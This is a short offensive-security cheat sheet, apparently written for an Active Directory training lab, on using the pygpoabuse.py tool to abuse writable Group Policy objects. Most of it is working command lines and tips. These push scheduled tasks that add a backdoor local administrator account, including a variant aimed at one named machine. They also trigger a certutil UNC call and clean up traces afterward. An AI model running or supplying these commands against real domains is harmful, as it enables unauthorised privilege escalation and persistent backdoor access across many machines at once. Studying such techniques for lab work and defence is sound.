#
pygpoabuse.py
Very cool utility to abuse GPO objects where you have excessive permissions, such as GenericWrite. Here's an example:
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -vIn the command above:
THE ID YOU COPIED MINUS THE CURLY BRACES- is exactly that: the ID you copy off the GPO in BloodHound, minus the curly braces.BACKDOORUSERwould be a local admin account you want to install on the system.Mypass123!- is the password that will be assigned to your backdoor account. IMPORTANT: MAKE THE PASSWORD FEWER THAN 14 CHARACTERS!-taskname "Whatever you wanna call the task"- is exactly that: some name for the scheduled task that gets queued up behind the scenes.-v- adds verbosity
Tip
When using this to summon a command such as -command "certutil -syncwithwu \\\\10.1.2.3" you'll want to escape backslashes in a UNC path with double backslashes.
Tip #2
If you run this script without a -command flag, it will insert a scheduled task that has a payload of something like:
net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /addI'm not 100% on this, but I think you need to use && and not literally && in the .xml file or the task will fail.
Tip #3
If you want to target your payload to only fire on a specific machine name, use the if command like so:
if /i "%COMPUTERNAME%"=="VICTIM-PC-LOL" net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /addTip #4
To cleanup the ScheduledTasks.xml it's the same command as you did to create the task, but with --cleanup added:
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" --cleanup -v--cleanup- cleans up (deletes) the task after it runs